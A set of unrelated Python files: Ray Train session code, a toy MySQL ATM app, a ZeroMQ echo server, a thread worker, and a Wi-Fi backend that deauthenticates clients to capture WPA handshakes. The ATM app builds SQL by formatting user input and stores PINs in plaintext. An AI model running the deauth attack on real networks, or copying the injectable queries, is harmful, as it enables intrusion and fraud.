time_this_iter = current_time - self.last_report_time
self.iteration += 1
self.time_total += time_this_iter
self.last_report_time = current_time
auto_filled_metrics = {
DATE: current_datetime.strftime("%Y-%m-%d_%H-%M-%S"),
TIMESTAMP: int(time.mktime(current_datetime.timetuple())),
TIME_THIS_ITER_S: time_this_iter,
TIME_TOTAL_S: self.time_total,
PID: os.getpid(),
HOSTNAME: platform.node(),
NODE_IP: self.local_ip,
TRAINING_ITERATION: self.iteration
}
if not self.detailed_autofilled_metrics:
auto_filled_metrics = {
k: v
for k, v in auto_filled_metrics.items()
if k not in DETAILED_AUTOFILLED_KEYS
}
result = result.copy()
result.update(auto_filled_metrics)
return result
def report(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread."""
if self.ignore_report:
return
kwargs = self._auto_fill_metrics(kwargs)
result = TrainingResult(TrainingResultType.REPORT, kwargs.copy())
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until main thread
# triggers resume.
self.continue_lock.acquire()
def checkpoint(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread.
Also stores the checkpoint in ``self.loaded_checkpoint``.
"""
# Update session checkpoint to latest checkpoint.
self.loaded_checkpoint = kwargs
# Only store checkpoints on worker with rank 0.
if self.world_rank != 0:
kwargs = {}
result = TrainingResult(TrainingResultType.CHECKPOINT, kwargs)
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until
# checkpoint has been processed.
self.continue_lock.acquire()
_session = None
def init_session(*args, **kwargs) -> None:
global _session
if _session:
raise ValueError("A Train session is already in use. Do not call "
"`init_session()` manually.")
_session = Session(*args, **kwargs)
def get_session() -> Session:
global _session
if _session is None or not isinstance(_session, Session):
raise ValueError("Trying to access a Train session that has not been "
"initialized yet. Train functions like "
"`train.report()` should only be called from inside "
"the training function.")
return _session
def shutdown_session():
"""Shuts down the initialized session."""
global _session
_session = None
def get_dataset_shard(
dataset_name: Optional[str] = None) -> Optional[RayDataset]:
"""Returns the Ray Dataset or DatasetPipeline shard for this worker.
You should call ``to_torch()`` or ``to_tf()`` on this shard to convert
it to the appropriate framework-specific Dataset.
.. code-block:: python
import ray
from ray import train
def train_func():
model = Net()
for iter in range(100):
data_shard = train.get_dataset_shard().to_torch()
model.train(data_shard)
return model
dataset = ray.data.read_csv("train.csv")
dataset.filter(...).repeat().random_shuffle()
trainer = Trainer(backend="torch")
trainer.start()
# Trainer will automatically handle sharding.
train_model = trainer.run(train_func, dataset=dataset)
trainer.shutdown()
Args:
dataset_name (Optional[str]): If a Dictionary of Datasets was passed to
``Trainer``, then specifies which dataset shard to return.
Returns:
The ``Dataset`` or ``DatasetPipeline`` shard to use for this worker.
If no dataset is passed into Trainer, then return None.
"""
session = get_session()
shard = session.dataset_shard
if shard is None:
warnings.warn("No dataset passed in. Returning None. Make sure to "
"pass in a Ray Dataset to Trainer.run to use this "
"function.")
elif isinstance(shard, dict):
if not dataset_name:
raise RuntimeError(
"Multiple datasets were passed into ``Trainer``, "
"but no ``dataset_name`` is passed into "
"``get_dataset_shard``. Please specify which "
"dataset shard to retrieve.")
return shard[dataset_name]
return shard
def report(**kwargs) -> None:
"""Reports all keyword arguments to Train as intermediate results.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
train.report(hello="world")
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
Args:
**kwargs: Any key value pair to be reported by Train.
If callbacks are provided, they are executed on these
intermediate results.
"""
session = get_session()
session.report(**kwargs)
def world_rank() -> int:
"""Get the world rank of this worker.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
if train.world_rank() == 0:
print("Worker 0")
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
"""
session = get_session()
return session.world_rank
def local_rank() -> int:
"""Get the local rank of this worker (rank of the worker on its node).
.. code-block:: python
import time
from ray import train
def train_func():
if torch.cuda.is_available():
torch.cuda.set_device(train.local_rank())
...
trainer = Trainer(backend="torch", use_gpu=True)
trainer.start()
trainer.run(train_func)
trainer.shutdown()
"""
session = get_session()
return session.local_rank
def load_checkpoint() -> Optional[Dict]:
"""Loads checkpoint data onto the worker.
.. code-block:: python
from ray import train
def train_func():
checkpoint = train.load_checkpoint()
for iter in range(checkpoint["epoch"], 5):
print(iter)
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func, checkpoint={"epoch": 3})
# 3
# 4
trainer.shutdown()
Args:
**kwargs: Any key value pair to be checkpointed by Train.
Returns:
The most recently saved checkpoint if ``train.save_checkpoint()``
has been called. Otherwise, the checkpoint that the session was
originally initialized with. ``None`` if neither exist.
"""
session = get_session()
return session.loaded_checkpoint
def save_checkpoint(**kwargs) -> None:
"""Checkpoints all keyword arguments to Train as restorable state.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
train.save_checkpoint(epoch=iter)
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
Args:
**kwargs: Any key value pair to be checkpointed by Train.
"""
session = get_session()
session.checkpoint(**kwargs)
|
atm.py
|
import colorama
from colorama import Fore,Back
import mysql.connector as sql
import time
import sys
from os import system
import random
import threading
import itertools
'''For Connecting to your DATABASE Change below credentials and run SQL QUERIES which are at end of this code '''
while(1):
try:
LH=str(input("Enter the Host Name : "))
UN=str(input("Enter the User Name : "))
Pa=str(input("Enter the password : "))
port=str(input("Enter port Number(Default-3306) : "))
con=sql.connect(host=LH,user=UN,password=Pa,port=port)
C=con.cursor()
C.execute("show databases")
A=C.fetchall()
A=list(A)
D=0
for item in A:
if(item[0]=="apdbms"):
C.execute("use apdbms")
print("Database Selected")
time.sleep(2)
D=1
break
if(D==0):
print("You dont have the required database in your connection")
try:
C.execute("create database apdbms;")
C.execute("use apdbms")
C.execute("create table apdbms_Cust(Name varchar(20),ACCOUNT_NO int, PRIMARY KEY(ACCOUNT_NO));")
C.execute("create table apdbms_Bal(ACCOUNT_NO int , Balance int , foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
C.execute("create table apdbms_Acc(ACCOUNT_NO int ,PIN varchar(10), foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
C.execute("create table apdbms_wid(Date timestamp default current_timestamp ,ACCOUNT_NO int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
C.execute("create table apdbms_dep(Date timestamp default current_timestamp ,ACCOUNT_NO int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
C.execute("create table apdbms_tra(Date timestamp default current_timestamp ,ACCOUNT_NO int ,To_ACCOUNT int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
C.execute("create table apdbms_blo(ACCOUNT_NO int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);")
con.commit()
print("You are now connected to database ... you can start executing ")
time.sleep(2)
break
except Exception as a:
print("Some thing went Wrong ")
print("And the Error is : ",a)
break
break
except Exception as a:
print("Someting Went again")
print("And the Error is : ",a)
colorama.init(autoreset=True)
def clear():
_ = system('cls')
#For Logo
print(Fore.GREEN + '''
db db .d8b. .o88b. db dD d88888b d8888b. Cb .d8888. .d8b. d888888b .88b d88.
88 88 d8' `8b d8P Y8 88 ,8P' 88' 88 `8D `D 88' YP d8' `8b `~~88~~' 88'YbdP`88
88ooo88 88ooo88 8P 88,8P 88ooooo 88oobY' ' `8bo. 88ooo88 88 88 88 88
88~~~88 88~~~88 8b 88`8b 88~~~~~ 88`8b `Y8b. 88~~~88 88 88 88 88
88 88 88 88 Y8b d8 88 `88. 88. 88 `88. db 8D 88 88 88 88 88 88
YP YP YP YP `Y88P' YP YD Y88888P 88 YD `8888Y' YP YP YP YP YP YP
''')
print(Fore.RED + "Only a true hacker can login ... !")
print(Fore.YELLOW + "Hacker Never Quits...!")
print(
Fore.GREEN +
"<<<<====================================>>>Never Give Up<<<====================================>>>>"
)
H=0
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if H:
break
sys.stdout.write('\rH4CK!N9... ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rHere You Go ....!')
while(1):
clear()
print(''' 1. LOGIN 2.SIGNUP 3.Exit''')
fc=int(input("Enter Your Choice :"))
c=0
if(fc==1):
ACC = int(input(Fore.GREEN + "Please Enter secret Account Number :")) #Taking Account Number from user
ch="select * from apdbms_Cust where ACCOUNT_NO={}".format(ACC)
C.execute(ch)
C.fetchall()
ans=C.rowcount
ch2="select * from apdbms_acc where ACCOUNT_NO={}".format(ACC)
C.execute(ch2)
C.fetchall()
ansc=C.rowcount
ch3="select * from apdbms_Blo where ACCOUNT_NO={}".format(ACC)
C.execute(ch3)
C.fetchall()
ansc2=C.rowcount
animation = ["[■□□□□□□□□□]","[■■□□□□□□□□]", "[■■■□□□□□□□]", "[■■■■□□□□□□]", "[■■■■■□□□□□]", "[■■■■■■□□□□]", "[■■■■■■■□□□]", "[■■■■■■■■□□]", "[■■■■■■■■■□]", "[■■■■■■■■■■]"]
for i in range(10):
time.sleep(0.5)
sys.stdout.write(Fore.GREEN+"\rLogging in.... " + animation[i % len(animation)])
sys.stdout.flush()
if (ans==0):
print(Back.YELLOW+Fore.RED+"Account Not Exist's.....!")
Exit="3X7!N9.....!"
for char in Exit:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
time.sleep(0.5)
break
elif(ans ==1 and ansc== 0):
print("You Almost Done ,.... Just create a pin below to go ahead")
pin=str(input("Enter Your New PIN : "))
C.execute("insert into apdbms_acc values({},'{}');".format(ACC,pin))
con.commit()
print("Please deposit some money to your account : ",end=" ")
ubal=int(input())
C.execute("insert into apdbms_bal values({},{})".format(ACC,ubal)) #Updating Balance in Database
con.commit()
print("Your are done you can login now")
elif(ansc2==1):
print("Your Account is Temporary Blocked Contact Admin for futhur Queries")
time.sleep(3)
clear()
elif( ans ==1 and ansc==1 and ansc2!= 1):
print(Back.GREEN+Fore.RED+"H4CK3R5 B4NK W31C0M35 Y0U......!")
ch2="select PIN from apdbms_acc where ACCOUNT_NO={} ".format(ACC)
C.execute(ch2)
ans1=C.fetchone() #If Account Number exists we can login....
for i in range(3):
if(c==1):
break
print("Please Enter you MASTER P!N :",end=" ")
pas=str(input(Fore.RED)) #Taking PIN from USER
if(pas==ans1[0]): #Checking PIN is Correct or Not
while(1):
print(Fore.LIGHTYELLOW_EX+"U HACKED IT.....!")
print(Fore.GREEN+"You successfully logged in .. ! .. Here you go ... : > ")
print(Fore.BLUE+'''1.Depositng money
2.Withdrawing money
3.Transfering money
4.Checking balance
5.Changing PIN
6.View Statement
7.Log OUt
''')
print('Enter Your Choice:',end=" ")
choice_login=int(input())
if(choice_login==1): #For Depositing Money
dep_money=float(input('Enter the amount u want to deposit:')) #Taking deposit Amount
C.execute("SELECT Balance from apdbms_bal where ACCOUNT_NO={}".format(ACC))
bal=C.fetchone()
bal=bal[0]
t = threading.Thread(target=animate)
t.start()
time.sleep(5)
H=1
time.sleep(1)
print("Old Balance : ",bal)
ubal=bal+dep_money #Updating Balance
print("Updated Balance :",ubal)
C.execute("UPDATE apdbms_bal set Balance={} where ACCOUNT_NO={}".format(ubal,ACC)) #Updating Balance in Database
con.commit()
C.execute("insert into apdbms_dep values(current_timestamp,{},{});".format(ACC,dep_money))
con.commit()
print('Money Deposited Successfully to your Account')
time.sleep(3)
clear()
elif(choice_login==2): #For Withdrawing Money
print("M0N3Y IS FOR EVERY ONE .. HERE Y0U C4N WITHDRAW YOUR 4M0UNT")
print('Enter Amount to Withdraw:',end=" ") #Taking Amount from user to
amt_withdraw=float(input())
print("WE HOPE YOUR PRIVACY .... Please Enter Your PIN AGAIN : " , end=" ") #Checking Intigrity by taking PIN again
pin=str(input())
ch3="select PIN from apdbms_acc where ACCOUNT_NO={} ".format(ACC) #Checking from Database
C.execute(ch3)
ans3=C.fetchone()
if(pin==ans3[0]): #Taking deposit Amount
C.execute("SELECT Balance from apdbms_bal where ACCOUNT_NO={}".format(ACC))
bal=C.fetchone()
bal=bal[0]
print(bal)
if(bal>=amt_withdraw):
ubal=bal-amt_withdraw #Updating Balance
print(ubal)
C.execute("UPDATE apdbms_bal set Balance={} where ACCOUNT_NO={}".format(ubal,ACC)) #Updating Balance in Database
con.commit()
C.execute("insert into apdbms_wid values(current_timestamp,{},{});".format(ACC,amt_withdraw))
con.commit()
print('Money Withdrawal Successful')
time.sleep(3)
clear()
else:
print("You Dont Have Sufficient Balance to with draw")
clear()
else:
print("Your are not an 37H!C41 H4CK3R ..")
Exit="3X7!N9.....!"
for char in Exit:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
time.sleep(0.5)
clear()
elif(choice_login==3): #For Transfering Money
print('Enter the Account Number you want to transfer',end=" ")
trans_acc=int(input()) #Taking Input from USER
ch4="select * from apdbms_acc where ACCOUNT_NO={}".format(trans_acc)
C.execute(ch4)
C.fetchall()
ans4=C.rowcount
if(ans4==1):
print("Enter the Amount to transfer : ",end=" ")
trans_amount=float(input())
C.execute("SELECT Balance from apdbms_bal where ACCOUNT_NO={}".format(ACC))
bal=C.fetchone()
bal=bal[0]
if(bal>=trans_amount): #Checking Whether the user has sufficient funds or not
bal=bal-trans_amount
C.execute("SELECT Balance from apdbms_bal where ACCOUNT_NO={}".format(trans_acc))
bal1=C.fetchone()
bal1=bal1[0]
bal1=bal1+trans_amount
print(bal1)
C.execute("UPDATE apdbms_bal set Balance={} where ACCOUNT_NO={}".format(bal,ACC))
'''Transfering Balance from one account to another account'''
C.execute("UPDATE apdbms_bal set Balance={} where ACCOUNT_NO={}".format(bal1,trans_acc))
con.commit()
C.execute("insert into apdbms_tra values(current_timestamp,{},{},{});".format(ACC,trans_acc,trans_amount))
con.commit()
print('Amount transferred Successfully')
time.sleep(3)
clear()
else:
print("S0RRY .,,, Y0U D0N7 H@V3 SUFFICIENT BALANCE ...,, :~(") #Message showing if user has unsufficient Balance
time.sleep(3)
clear()
elif(choice_login==4): #Checking Balance
C.execute("SELECT Balance from apdbms_bal where ACCOUNT_NO={}".format(ACC))
bal=C.fetchone()
bal=bal[0]
print("Your Balance is",bal) #Checking Balance
time.sleep(3)
clear()
elif(choice_login==5):
print("WE HOPE YOUR PRIVACY .... Please Enter Your PIN AGAIN : " , end=" ")
pin=str(input())
ch3="select PIN from apdbms_acc where ACCOUNT_NO='{}' ".format(ACC)
C.execute(ch3)
ans3=C.fetchone()
if(pin==ans3[0]):
print("Enter your new PIN :",end=" ")
npin=str(input()) #Taking New PIN
C.execute("update apdbms_acc set PIN='{}' where ACCOUNT_NO={}".format(npin, ACC))
con.commit()
print("Pin is UPDATED")
time.sleep(3)
clear()
else:
print("U R NOT A TRUE H4CK3R .. Never come AGAIN")
clear()
elif(choice_login==6):
clear()
C.execute("select Name from apdbms_cust where ACCOUNT_NO={};".format(ACC))
NA=C.fetchall()
print(Fore.GREEN +"<<<<====================================>>>HBUCD<<<====================================>>>>")
print(Back.GREEN+Fore.RED+'''HACKERS BANK USER CONFIDENTIAL DATA ''')
print(Fore.RED+"H@CK3R :"+Fore.GREEN +"{} ".format(NA[0][0])+Fore.RED+"Account Number :"+Fore.GREEN+"{} ".format(ACC))
C.execute("select * from apdbms_wid where ACCOUNT_NO={}".format(ACC))
WIT=C.fetchall()
print("Withdraw's Table : ")
print("+--------------------------------+")
if(C.rowcount>=1):
print("| Date and Time | Amount |")
print("+--------------------------------+")
for rec in WIT:
print("|",rec[0],"|"+" "*(10-len(str(rec[1]))),rec[2],"|")
else:
print("You dont have any recent withdraws")
print("+--------------------------------+")
C.execute("select * from apdbms_dep where ACCOUNT_NO={}".format(ACC))
WID=C.fetchall()
print("Deposits's Table : ")
print("+--------------------------------+")
if(C.rowcount>=1):
print("| Date and Time | Amount |")
print("+--------------------------------+")
for rec in WID:
print("|",rec[0],"|"+" "*(10-len(str(rec[1]))),rec[2],"|")
else:
print("You dont have any recent Deposits")
print("+--------------------------------+")
C.execute("select * from apdbms_tra where ACCOUNT_NO={}".format(ACC))
TID=C.fetchall()
print("Transfer's Table : ")
print("+------------------------------------------------+")
if(C.rowcount>=1):
print("| Date and Time | Amount | Transfer to |")
print("+------------------------------------------------+")
for rec in TID:
print("|",rec[0],"|"+" "*(10-len(str(rec[1]))),rec[3],"|"," "*8,rec[2],"|")
else:
print("You dont have any recent Transfers")
print("+------------------------------------------------+")
elif(choice_login==7):
print("Thank You Visit Again.......!")
c=1
break
else:
print("Please Enter Correct Option....!")
time.sleep(2)
clear()
else:
if(i<2):
print("You Have only {} Chances left ".format(2-i))
else:
print("Maximum Number of attempts Extended ....")
C.execute("insert into apdbms_blo values({})".format(ACC))
con.commit()
time.sleep(2)
else:
print("This Account Does't Exist .. plese check correctly")
elif(fc==2):
print("H4CK3R5 B4NK W31C0M35 Y0U .... !")
print("Please Enter Your Name : ",end=" ") #Creating New User
Name=str(input())
F=1
while(F): #Creating a random 4 digit Account Number
ACC=random.randint(1000,9999)
ch="select * from apdbms_Cust where ACCOUNT_NO={}".format(ACC)
C.execute(ch)
C.fetchall()
ans=C.rowcount
if( ans !=1 ):
F=0
C.execute("insert into apdbms_Cust values('{}',{});".format(Name,ACC))
con.commit()
print("Your Account Number is {}".format(ACC))
print("Thank You For Choosing Our Bank....Login Again to choose the PIN")
time.sleep(5)
clear()
elif(fc==3):
print("Thank You Visit Again ...!")
Exit="3X7!N9.....!"
for char in Exit:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
time.sleep(0.5)
clear()
break
else:
print("Please choose correct Option")
time.sleep(2)
clear()
'''
SQL Queries for Creating Tables and Database .. simply Execute Below Queries in MySQL
create database apdbms;
use apdbms;
create table apdbms_Cust(Name varchar(20),ACCOUNT_NO int, PRIMARY KEY(ACCOUNT_NO));
create table apdbms_Bal(ACCOUNT_NO int , Balance int , foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
create table apdbms_Acc(ACCOUNT_NO int ,PIN varchar(10), foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
create table apdbms_wid(Date timestamp default current_timestamp ,ACCOUNT_NO int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
create table apdbms_dep(Date timestamp default current_timestamp ,ACCOUNT_NO int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
create table apdbms_tra(Date timestamp default current_timestamp ,ACCOUNT_NO int ,To_ACCOUNT int ,Amount int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
create table apdbms_blo(ACCOUNT_NO int, foreign key(ACCOUNT_NO) references apdbms_Cust(ACCOUNT_NO) on delete cascade);
'''
'''
d888888b db db .d8b. d8b db db dD db db .d88b. db db .d8888. d888888b d8888b.
`~~88~~' 88 88 d8' `8b 888o 88 88 ,8P' `8b d8' .8P Y8. 88 88 88' YP `88' 88 `8D
88 88ooo88 88ooo88 88V8o 88 88,8P `8bd8' 88 88 88 88 `8bo. 88 88oobY'
88 88~~~88 88~~~88 88 V8o88 88`8b 88 88 88 88 88 `Y8b. 88 88`8b
88 88 88 88 88 88 V888 88 `88. 88 `8b d8' 88b d88 db 8D .88. 88 `88.
YP YP YP YP YP VP V8P YP YD YP `Y88P' ~Y8888P' `8888Y' Y888888P 88 YD
'''
|
echo_server.py
|
import threading
import time
from signal import SIGINT, SIGTERM, signal
import zmq
from agents import Agent
class EchoServer(Agent):
def setup(self, name=None, address=None):
self.connection = self.bind_socket(zmq.REP, {}, address)
self.connection.observable.subscribe(self.echo)
def echo(self, xs):
self.connection.send(xs)
class Client(Agent):
def setup(self, name=None, address=None):
self.counter = 0
# receive
self.connection = self.connect_socket(zmq.REQ, {}, address)
self.connection.observable.subscribe(lambda x: self.log.info(f"received: {x}"))
# begin sending forever, add to managed threads for graceful cleanup
t = threading.Thread(target=self.send_forever)
self.threads.append(t)
t.start()
def send_forever(self):
# use exit event to gracefully exit loop and graceful cleanup
while not self.exit_event.is_set():
time.sleep(1)
self.counter += 1
multipart_message = [str(self.counter).encode()]
self.log.info(f"sending: {multipart_message}")
self.connection.send(multipart_message)
if __name__ == "__main__":
echo_server = EchoServer(name="server", address="tcp://0.0.0.0:5000")
client = Client(name="client", address="tcp://0.0.0.0:5000")
# override shutdown signals
def shutdown(signum, frame):
client.shutdown()
echo_server.shutdown()
signal(SIGTERM, shutdown)
signal(SIGINT, shutdown)
|
backend.py
|
import os
import re
import time
import threading
import subprocess
import lib.eviltwin
from lib import settings
from lib.resp import Resp
from lib.accesspoints.backend import APs
from lib.handshake.deauth import Deauthenticate
class Target:
def __init__(self, bssid, essid, chann, is_captured=False):
self.bssid = bssid
self.essid = essid
self.chann = chann
self.is_active = True
self.is_captured = is_captured
self.deauth = Deauthenticate(settings.DEAUTH_INTERFACE, bssid)
@property
def serialize(self):
return {
"bssid": self.bssid,
"essid": self.essid,
"chann": self.chann,
"isActive": self.is_active,
"isCaptured": self.is_captured,
}
class HandshakeBackend:
__target = None
__target_lock = threading.RLock()
__deauth_lock = threading.RLock()
__is_attacking = False
__airodump_process = None
__accesspoint_details = APs(
csv_file=f"{settings.HANDSHAKE_OUTPUT}-01.csv", is_single_ap=True
)
@staticmethod
def get_target():
with HandshakeBackend.__target_lock:
return HandshakeBackend.__target
@staticmethod
def remove_output_files():
n = 1
while True:
p1 = f"{settings.HANDSHAKE_OUTPUT}-{n:02}.csv"
p2 = f"{settings.HANDSHAKE_OUTPUT}-{n:02}.cap"
if not os.path.exists(p1):
break
os.remove(p1)
if os.path.exists(p2):
os.remove(p2)
n += 1
@staticmethod
def get_details():
resp = Resp()
with HandshakeBackend.__target_lock:
if not HandshakeBackend.__target:
return resp
if not HandshakeBackend.__target.is_captured:
return resp
return HandshakeBackend.__accesspoint_details.get_output()
@staticmethod
def __update_ap_info():
ap = HandshakeBackend.__accesspoint_details.get_output().serialize[
"value"
]
ap = list(ap.values())
if not len(ap):
return
ap = ap[0]
target = Target(
ap["bssid"], ap["essid"], ap["chann"], is_captured=True
)
with HandshakeBackend.__target_lock:
HandshakeBackend.__target = target
@staticmethod
def __airodump_is_active():
process = HandshakeBackend.__airodump_process
return False if not process else process.poll() == None
@staticmethod
def __start_airodump():
target = HandshakeBackend.__target
output_file = settings.HANDSHAKE_OUTPUT
interface = settings.HANDSHAKE_INTERFACE
if not target:
return
HandshakeBackend.remove_output_files()
cmd = f"airodump-ng -a --bssid {target.bssid} -c {target.chann} -w {output_file} --output-format cap,csv --ig {interface}"
HandshakeBackend.__airodump_process = subprocess.Popen(
cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.DEVNULL,
stderr=subprocess.STDOUT,
)
time.sleep(1.5)
@staticmethod
def __stop_airodump():
process = HandshakeBackend.__airodump_process
if not process or not HandshakeBackend.__airodump_is_active():
return
attempts = 10
for _ in range(attempts):
if not HandshakeBackend.__airodump_is_active():
return
HandshakeBackend.__airodump_process.kill()
time.sleep(0.45)
@staticmethod
def __check_for_handshake():
with HandshakeBackend.__target_lock:
if not HandshakeBackend.__target:
return
if HandshakeBackend.__target.is_captured:
return True
result = subprocess.getoutput(
f"aircrack-ng {settings.HANDSHAKE_OUTPUT}-01.cap"
)
is_captured = len(re.findall(r"[1-9]\shandshake", result)) != 0
if is_captured:
with HandshakeBackend.__target_lock:
HandshakeBackend.__target.is_captured = True
return is_captured
@staticmethod
def __attack():
max_pkts = [96, 128, 256]
ptr = 0
while True:
with HandshakeBackend.__target_lock:
if not HandshakeBackend.__target:
break
if (
not HandshakeBackend.__target.is_active
or HandshakeBackend.__target.is_captured
):
break
for _ in range(max_pkts[ptr]):
try:
HandshakeBackend.__target.deauth.sendp()
except:
break
ptr = ptr + 1 if ptr + 1 < len(max_pkts) else 0
# Wait clients to reconnect
for _ in range(60):
time.sleep(0.5)
with HandshakeBackend.__target_lock:
if not HandshakeBackend.__target:
break
if not HandshakeBackend.__target.is_active:
break
if HandshakeBackend.__check_for_handshake():
HandshakeBackend.__update_ap_info()
HandshakeBackend.stop_process()
break
with HandshakeBackend.__deauth_lock:
HandshakeBackend.__is_attacking = False
@staticmethod
def __connected_clients_count():
ap_list = (
HandshakeBackend.__accesspoint_details.get_output().value.values()
)
if not len(ap_list):
return 0
return len(list(ap_list)[0]["clients"])
@staticmethod
def perform_attack():
with HandshakeBackend.__deauth_lock:
if HandshakeBackend.__is_attacking:
return
with HandshakeBackend.__target_lock:
if not HandshakeBackend.__target:
return
if (
not HandshakeBackend.__target.is_active
or HandshakeBackend.__target.is_captured
):
return
with HandshakeBackend.__deauth_lock:
HandshakeBackend.__is_attacking = True
t = threading.Thread(target=HandshakeBackend.__attack, daemon=True)
t.start()
@staticmethod
def start_process(bssid, essid, chann):
resp = Resp()
eviltwin_status = (
lib.eviltwin.backend.EviltwinBackend.status().value.get(
"eviltwin", None
)
)
if eviltwin_status:
if eviltwin_status.get("isActive", False):
resp.msg = "Eviltwin is active, cannot start handshake"
return resp
if HandshakeBackend.__target and HandshakeBackend.__target.is_active:
resp.msg = "Handshake process is already active"
return resp
with HandshakeBackend.__target_lock:
HandshakeBackend.__target = Target(bssid, essid, chann)
HandshakeBackend.__start_airodump()
if not HandshakeBackend.__airodump_is_active():
with HandshakeBackend.__target_lock:
HandshakeBackend.__target = None
resp.msg = "Failed to start handshake"
return resp
resp.value = {"target": HandshakeBackend.__target.serialize}
resp.msg = "Handshake process started successfully"
resp.status = Resp.SUCCESS_CODE
return resp
@staticmethod
def stop_process():
resp = Resp()
# if not (HandshakeBackend.__target or HandshakeBackend.__airodump_is_active()):
# resp.status = Resp.SUCCESS_CODE
# resp.msg = 'Handshake process is already inactive'
# return resp
if not (
HandshakeBackend.__target or HandshakeBackend.__target.is_active
):
resp.status = Resp.SUCCESS_CODE
resp.msg = "Handshake process is already inactive"
return resp
HandshakeBackend.__stop_airodump()
if HandshakeBackend.__airodump_is_active():
resp.msg = "Failed to stop handshake process"
return resp
with HandshakeBackend.__target_lock:
# HandshakeBackend.__target = None
HandshakeBackend.__target.is_active = False
HandshakeBackend.__airodump_process = None
resp.msg = "Successfully stopped handshake process"
resp.status = Resp.SUCCESS_CODE
return resp
@staticmethod
def status():
resp = Resp()
status = {"target": None}
with HandshakeBackend.__target_lock:
if HandshakeBackend.__target:
status["target"] = HandshakeBackend.__target.serialize
resp.value = status
resp.status = Resp.SUCCESS_CODE
return resp
|
amber.py
|
from __future__ import absolute_import
import os
import time
import pytraj as pt
import threading
from .base import BaseMD
class AmberMD(BaseMD):
# TODO: doc
'''
Unstable API
Examples
--------
>>> from nglview.sandbox.amber import AmberMD
>>> amber_view = AmberMD(top='./peptide.top', restart='./md.r', reference='min.rst7')
>>> view = amber_view.initialize()
>>> view
>>> # another cell
>>> amber_view.update(every=1, timeout=3000)
>>> # do other stuff
'''
def __init__(self, top=None, restart=None, reference=None):
self.top = top
assert os.path.exists(restart), '{} must exists'.format(restart)
assert os.path.exists(reference), '{} must exists'.format(reference)
self.restart = restart
self.reference_traj = pt.load(reference, top=self.top)
self.thread = None
self.event = None
def initialize(self, gui=False):
self.view = self.reference_traj.visualize(gui=gui)
return self.view
def update(self, every=1, timeout=3000, callback=None):
"""
Parameters
----------
every : int, default 1 (s)
update coordinates "every" second
timeout : int, default 3000 (s)
stop updating coordinate after "timeout"
callback : func, optional
If given, trajectory will be processed (autoimage, ...)
Must follow func(traj)
"""
# always reset
self.event = threading.Event()
def _update(event):
start = time.time()
while time.time() - start <= timeout and not event.is_set():
time.sleep(every)
traj = pt.load(self.restart, top=self.top)
if callback is not None:
callback(traj)
else:
mask = '@C,N,O,CA,P'
pt.superpose(traj, mask=mask, ref=self.reference_traj)
self._update_coordinates(traj[0].xyz)
# non-blocking so we can use other Jupyter's cells
self.thread = threading.Thread(target=_update, args=(self.event, ))
self.thread.daemon = True
self.thread.start()
def stop(self):
"""Stop update"""
if self.event is not None:
self.event.set()
def _update_coordinates(self, xyz):
self.view.coordinates_dict = {0: xyz}
|
worker.py
|
import threading
import queue
import time
from typing import Callable, Optional, Any, Tuple, Dict
class Worker:
_instances = dict()
VERBOSE = False
@classmethod
def instance(cls, id: str) -> "Worker":
if id not in cls._instances:
worker = Worker(id)
worker.start()
cls._instances[id] = worker
return cls._instances[id]
@classmethod
def stop_all(cls):
for worker in cls._instances.values():
worker.stop()
def __init__(self, id: str):
self.id = id
self._queue = queue.Queue()
self._results = dict()
self._thread: Optional[threading.Thread] = None
self._stop = False
def __del__(self):
if self.is_running:
self.stop()
def log(self, *args):
if self.VERBOSE:
print(f"Worker {self.id}: {threading.current_thread().name}:", *args)
@property
def is_running(self):
return self._thread and self._thread.is_alive()
def start(self):
self.log("start")
if self._thread is not None:
raise RuntimeError(f"Worker already started")
self._thread = threading.Thread(target=self._thread_loop)
self._stop = False
self._thread.start()
def stop(self):
self.log("stop")
if self.is_running:
self._queue.put_nowait("STOP")
self._stop = True
self._thread.join()
self._thread = None
def request(self, id: str, func: Callable, extra: Optional[Any] = None):
self.log("request", id, func)
self._queue.put_nowait((id, func, extra))
def pop_result(self, id: str) -> Optional[Dict[str, Any]]:
if id in self._results:
self.log("pop result", id)
result = self._results.pop(id)
return {
"result": result[0],
"extra": result[1],
}
return None
def _thread_loop(self):
threading.current_thread().name = f"{self.id}-thread"
while not self._stop:
try:
self.log("wait for work")
work = self._queue.get(True, timeout=10)
if work == "STOP":
break
